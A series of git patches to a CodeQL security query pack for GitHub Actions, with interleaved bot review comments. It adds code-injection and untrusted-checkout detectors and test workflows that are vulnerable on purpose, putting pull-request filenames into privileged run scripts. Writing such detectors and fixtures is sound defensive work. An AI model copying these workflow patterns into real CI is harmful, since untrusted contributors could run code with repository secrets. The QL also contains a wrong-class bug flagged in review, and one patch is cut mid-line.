diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml new file mode 100644 index 00000000000..03ee63fe9cf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml @@ -0,0 +1,64 @@ +name: List files + +on: + pull_request_target: + types: [ opened, synchronize, workflow_dispatch] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + runs-on: ubuntu-latest + env: + GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" + steps: + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed + with: + list-files: json + filters: | + locale: + - '*.xml' + - name: Changed files 1 + run: | + echo changed: ${{ steps.changed.outputs.locale_files }} + echo changed: ${{ steps.changed.outputs.changes }} + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed2 + with: + list-files: csv + filters: | + locale: + - '*.xml' + - name: Changed files 2 + run: | + echo changed:${{ steps.changed2.outputs.locale_files }} + echo changed: ${{ steps.changed2.outputs.changes }} + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed3 + with: + list-files: shell + filters: | + locale: + - '*.xml' + - name: Changed files 3 + run: | + echo changed:${{ steps.changed3.outputs.locale_files }} + echo changed: ${{ steps.changed3.outputs.changes }} + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed4 + with: + list-files: escape + filters: | + locale: + - '*.xml' + - name: Changed files 4 + run: | + echo changed:${{ steps.changed4.outputs.locale_files }} + echo changed: ${{ steps.changed4.outputs.changes }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 50cb0c40d24..e220d368b20 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -55,6 +55,8 @@ edges | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | 
@@ -210,6 +212,10 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | semmle.label | Uses Step: changed | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 9068ef92715..1c4ab8a61cf 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -55,6 +55,8 @@ edges | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | 
@@ -210,6 +212,10 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | semmle.label | Uses Step: changed | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -319,6 +325,8 @@ subpaths | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | From b22e305699b1a3e56cb20dcf05db14ae8ece50d2 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 23:32:42 +0200 Subject: [PATCH 0241/1267] Fix untrusted checkout tests --- ...or.expected => PrivilegedUntrustedCheckoutCritical.expected} | 0 .../Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref | 1 + ...arning.expected => PrivilegedUntrustedCheckoutHigh.expected} | 2 +- .../Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref | 1 + .../query-tests/Security/CWE-829/UntrustedCheckoutError.qlref | 1 - .../query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref | 1 - 6 files changed, 3 insertions(+), 3 deletions(-) rename ql/test/query-tests/Security/CWE-829/{UntrustedCheckoutError.expected => PrivilegedUntrustedCheckoutCritical.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref rename ql/test/query-tests/Security/CWE-829/{UntrustedCheckoutWarning.expected => PrivilegedUntrustedCheckoutHigh.expected} (97%) create mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected rename to ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref new file mode 100644 index 00000000000..8fe52c7d914 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref @@ -0,0 +1 @@ +Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected similarity index 97% rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected rename to ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected index 628234f7e8b..dc5a6bc915f 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected @@ -1,4 +1,4 @@ -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +j .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref new file mode 100644 index 00000000000..32953132a45 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref @@ -0,0 +1 @@ +Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref deleted file mode 100644 index 1192fcfe616..00000000000 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref +++ /dev/null 
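Review bot: The first row of the renamed `PrivilegedUntrustedCheckoutHigh.expected` now starts with `j` instead of `|` (`+j .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | ...`), which looks like a stray keystroke. The query output will not match this line, so the test for `PrivilegedUntrustedCheckoutHigh.ql` should fail until the leading character is restored to `|`. The rename is presumably reported as 97% similar rather than 100% because of this one-character change.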
@@ -1 +0,0 @@ -Security/CWE-829/UntrustedCheckoutError.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref deleted file mode 100644 index 8c77a95b48c..00000000000 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-829/UntrustedCheckoutWarning.ql From 5d6a3c4900d427da833674a18796601c8e202a12 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Tue, 7 May 2024 09:45:12 +0200 Subject: [PATCH 0242/1267] Copy master branch only --- .github/workflows/copy-to-bughalla.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 572d987ce37..a6b568f2bfb 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml @@ -1,6 +1,9 @@ name: Copy to Bughalla -on: push +on: + push: + branches: + - 'master' permissions: contents: read From 778c6ad923c5164cb86ff53f0e3ac461830d5f77 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 7 May 2024 10:41:42 +0200 Subject: [PATCH 0243/1267] Fix tj-actions/changed-files sources --- .../codeql/actions/dataflow/FlowSources.qll | 38 +++++++++++- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 60 +++++++++++++------ ql/lib/ext/tj-actions_changed-files.model.yml | 22 ------- .../tj-actions_verify-changed-files.model.yml | 6 -- .../.github/workflows/changed-files.yml | 31 +++++++--- .../Security/CWE-094/CodeInjection.expected | 12 ++-- .../CWE-094/PrivilegedCodeInjection.expected | 9 ++- 7 files changed, 118 insertions(+), 60 deletions(-) delete mode 100644 ql/lib/ext/tj-actions_changed-files.model.yml delete mode 100644 ql/lib/ext/tj-actions_verify-changed-files.model.yml 
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index db111b9e190..b4cf1f70315 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -263,7 +263,7 @@ private class ArtifactSource extends RemoteFlowSource { /** * A list of file names returned by dorny/paths-filter. */ -private class DornyPathsFilterSource extends RemoteFlowSource { +class DornyPathsFilterSource extends RemoteFlowSource { DornyPathsFilterSource() { exists(UsesStep u | u.getCallee() = "dorny/paths-filter" and @@ -274,3 +274,39 @@ private class DornyPathsFilterSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } } + +/** + * A list of file names returned by tj-actions/changed-files. + */ +class TJActionsChangedFilesSource extends RemoteFlowSource { + TJActionsChangedFilesSource() { + exists(UsesStep u | + u.getCallee() = "tj-actions/changed-files" and + ( + u.getArgument("safe_output") = "false" or + u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 41 + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } +} + +/** + * A list of file names returned by tj-actions/verify-changed-files. + */ +class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { + TJActionsVerifyChangedFilesSource() { + exists(UsesStep u | + u.getCallee() = "tj-actions/verify-changed-files" and + ( + u.getArgument("safe_output") = "false" or + u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 17 + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 32c329d8c67..cb391f2a262 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
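Review bot: The version test in `TJActionsChangedFilesSource` and `TJActionsVerifyChangedFilesSource` only has a result when the ref is a numeric tag, because `toInt()` yields nothing for a commit SHA or a branch name. A step pinned by SHA to a release older than v41 (or v17 for verify-changed-files) is therefore treated as a source only when `safe_output` is `"false"`, and the test workflow in this commit uses tag refs only, so the gap is not exercised. If that is intentional for now, the QLDoc should say so, e.g. `* Refs that are not numeric tags (commit SHAs, branches) are matched only through safe_output.`. The identical `regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt()` chain in both classes would also read better as one shared helper.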
@@ -5,6 +5,7 @@ private import actions private import codeql.util.Unit private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery @@ -43,10 +44,6 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { ) } -class EnvToRunTaintStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) } -} - /** * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. * e.g. 
@@ -119,28 +116,57 @@ predicate artifactDownloadToUseStep(DataFlow::Node pred, DataFlow::Node succ) { ) } -class ArtifactDownloadToUseTaintStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - artifactDownloadToUseStep(node1, node2) - } -} - /** * A read of the _files field of the dorny/paths-filter action. */ predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(UsesStep u, StepsExpression o | - u.getCallee() = "dorny/paths-filter" and - u.getArgument("list-files") = ["csv", "json"] and - u = pred.asExpr() and - o.getStepId() = u.getId() and + exists(StepsExpression o | + pred instanceof DornyPathsFilterSource and + o.getStepId() = pred.asExpr().(UsesStep).getId() and o.getFieldName().matches("%_files") and succ.asExpr() = o ) } -class DornyPathsFilterTaintStep extends AdditionalTaintStep { +/** + * A read of user-controlled field of the tj-actions/changed-files action. + */ +predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = + [ + "added_files", "copied_files", "deleted_files", "modified_files", "renamed_files", + "all_old_new_renamed_files", "type_changed_files", "unmerged_files", "unknown_files", + "all_changed_and_modified_files", "all_changed_files", "other_changed_files", + "all_modified_files", "other_modified_files", "other_deleted_files", "modified_keys", + "changed_keys" + ] and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the tj-actions/verify-changed-files action. 
+ */ +predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "changed_files" and + succ.asExpr() = o + ) +} + +class TaintSteps extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - dornyPathsFilterTaintStep(node1, node2) + envToRunStep(node1, node2) or + artifactDownloadToUseStep(node1, node2) or + dornyPathsFilterTaintStep(node1, node2) or + tjActionsChangedFilesTaintStep(node1, node2) or + tjActionsVerifyChangedFilesTaintStep(node1, node2) } } diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml deleted file mode 100644 index 60fa0149573..00000000000 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ /dev/null 
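Review bot: `tjActionsVerifyChangedFilesTaintStep` constrains `pred instanceof TJActionsChangedFilesSource`, which is the source class for tj-actions/changed-files, so the predicate cannot hold for a tj-actions/verify-changed-files step and reads of that action's output stay untainted. The line should be `pred instanceof TJActionsVerifyChangedFilesSource and`. The model file deleted in this commit named the output `output.changed-files`, while the new predicate matches `changed_files`; the field name is worth confirming against the action's metadata. The CWE-094 test workflow touched by this commit exercises only changed-files, so a verify-changed-files case there would have caught this.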
@@ -1,22 +0,0 @@ -extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sourceModel - data: - - ["tj-actions/changed-files", "*", "output.added_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.copied_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.modified_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "filename", "manual"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml deleted file mode 100644 index 9dccf6d5e6c..00000000000 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ /dev/null 
@@ -1,6 +0,0 @@ -extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sourceModel - data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml index 12bade510ba..85f59f6fa26 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml @@ -2,8 +2,6 @@ name: CI on: pull_request: - branches: - - main jobs: changed_files: @@ -13,13 +11,32 @@ jobs: - uses: actions/checkout@v4 with: fetch-depth: 0 - - name: Get changed files - id: changed-files - uses: tj-actions/changed-files@v40 - - name: List all changed files + - name: Get changed files 1 + id: changed-files1 + uses: tj-actions/changed-files@v40 + - name: List all changed files 1 run: | - for file in ${{ steps.changed-files.outputs.all_changed_files }}; do + for file in ${{ steps.changed-files1.outputs.all_changed_files }}; do echo "$file was changed" done + - name: Get changed files 2 + id: changed-files2 + uses: tj-actions/changed-files@v41 + - name: List all changed files 2 + run: | + for file in ${{ steps.changed-files2.outputs.all_changed_files }}; do + echo "$file was changed" + done + + - name: Get changed files 3 + id: changed-files3 + uses: tj-actions/changed-files@v41 + with: + safe_output: false + - name: List all changed files 3 + run: | + for file in ${{ steps.changed-files3.outputs.all_changed_files }}; do + echo "$file was changed" + done diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index e220d368b20..e9738fa9458 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -6,7 +6,8 @@ edges | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$( Date: Tue, 7 May 2024 11:01:14 +0200 Subject: [PATCH 0244/1267] Update --- ql/test/library-tests/test.expected | 18 ------------------ .../PrivilegedUntrustedCheckoutHigh.expected | 2 +- 2 files changed, 1 insertion(+), 19 deletions(-) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index d7f944c5a3d..c735596ae05 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -455,24 +455,6 @@ sources | tj-actions/branch-names | * | output.current_branch | branch | manual | | tj-actions/branch-names | * | output.head_ref_branch | branch | manual | | tj-actions/branch-names | * | output.ref_branch | branch | manual | -| tj-actions/changed-files | * | output.added_files | filename | manual | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | filename | manual | -| tj-actions/changed-files | * | output.all_changed_files | filename | manual | -| tj-actions/changed-files | * | output.all_modified_files | filename | manual | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | filename | manual | -| tj-actions/changed-files | * | output.changed_keys | filename | manual | -| tj-actions/changed-files | * | output.copied_files | filename | manual | -| tj-actions/changed-files | * | output.deleted_files | filename | manual | -| tj-actions/changed-files | * | output.modified_files | filename | manual | -| tj-actions/changed-files | * | output.modified_keys | filename | manual | -| tj-actions/changed-files | * | output.other_changed_files | filename | manual | -| tj-actions/changed-files | * | output.other_deleted_files | filename | manual | -| tj-actions/changed-files | * | output.other_modified_files | filename | manual | -| tj-actions/changed-files | * | output.renamed_files | filename | manual | -| tj-actions/changed-files | * | output.type_changed_files | filename | manual | -| tj-actions/changed-files | * | output.unknown_files | filename | manual | -| tj-actions/changed-files | * | output.unmerged_files | filename | manual | -| tj-actions/verify-changed-files | * | output.changed-files | filename | manual | | trilom/file-changes-action | * | output.files | filename | manual | | trilom/file-changes-action | * | output.files_added | filename | manual | | trilom/file-changes-action | * | output.files_modified | filename | manual | 
diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected index dc5a6bc915f..628234f7e8b 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected @@ -1,4 +1,4 @@ -j .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 6a87192f6491a36d107c49e871228cf6488721a1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 09:42:56 +0200 Subject: [PATCH 0245/1267] Account for insecure action versions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 12 +++-- .../codeql/actions/dataflow/FlowSources.qll | 51 ++++++++++++++++++- .../.github/workflows/changed-files.yml | 18 +++++++ .../Security/CWE-094/CodeInjection.expected | 4 ++ .../CWE-094/PrivilegedCodeInjection.expected | 3 ++ .../CWE-829/UnpinnedActionsTag.expected | 32 ++++++------ 6 files changed, 98 insertions(+), 22 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 0cbb8ab10ed..83787882d6f 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ 